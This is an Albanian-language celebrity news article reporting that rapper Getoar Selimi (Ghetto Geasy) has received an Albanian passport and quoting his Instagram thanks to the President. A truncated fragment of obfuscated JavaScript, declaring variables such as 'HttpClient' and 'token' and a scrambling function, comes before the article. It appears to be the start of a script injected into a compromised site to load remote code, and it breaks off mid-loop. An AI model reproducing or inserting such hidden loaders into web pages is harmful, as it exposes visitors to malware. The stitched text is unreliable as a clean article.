;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Geti merr pasaportën shqiptare

By

Janë bërë më shumë se një vit që reperi Getoar Selimi është shpërngulur për të jetuar në Tiranë.  Reperi i hitit ‘N’Prishtinë’ përpos jetës atje është duke shijuar lidhjen me prezantuesen Marina Vjollca.

E dje i është bërë ëndrra realitet të pajiset me pasaportën shqiptare. Këtë gjë e ka bërë të ditur përmes llogarisë së tij në Instagram ku shprehet me tone patriotike kur flet për shqiponjën në pasaportë.

“Falenderoj Presidentin dhe Republikën e Shqipërisë për këtë pasaportë kaq të bukur me Shqiponjën tonë, që e kam ëndërruar ta kem edhe në pasaportën e Kosovës” – janë fjalët e Ghettogeasyt që shoqërohen me fotografinë.

Përtej retorikës së kauzës së bashkimit shqiptaro-shqiptar, pa dyshim se ky vendim i Presidentit Nishani në rrafshin praktik do t’i shërbejë si lehtësi për udhëtim pa viza në zonën Shengen të cilën e frekuenton shpesh shkaku i koncerteve të shumta në Europë.

Në planin muzikor ‘Sjena mo’ është projekti i fundit i reperit teksa akoma nuk ka paralajmëruar diçka të re.

Artikuj të ngjashëm